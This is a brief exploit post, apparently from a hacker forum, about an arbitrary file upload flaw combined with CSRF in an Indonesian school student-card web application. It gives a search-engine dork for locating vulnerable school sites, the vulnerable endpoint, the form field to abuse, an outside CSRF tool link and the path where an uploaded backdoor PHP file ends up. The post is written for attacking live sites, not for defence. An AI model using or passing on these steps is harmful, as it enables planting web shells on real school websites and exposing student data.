[+]Exploit title: Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF(indonesian school) [+]Author : ./meicookies [+]Dork : intext:Responsive image aplikasi kartu pelajar sch.id [+] Exploit: kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php if there is an alert "Data Berhasil di Ubah" the fucking website is vulnerable to arbitrary file upload [+] CSRF : https://tools.xploitsecid.or.id/Exploit/CSRF postfile : gambar [!] File Location : The files you upload will go to kartu.localcrot.sch.id/img/your_backdoor.php #hacktheplanet:D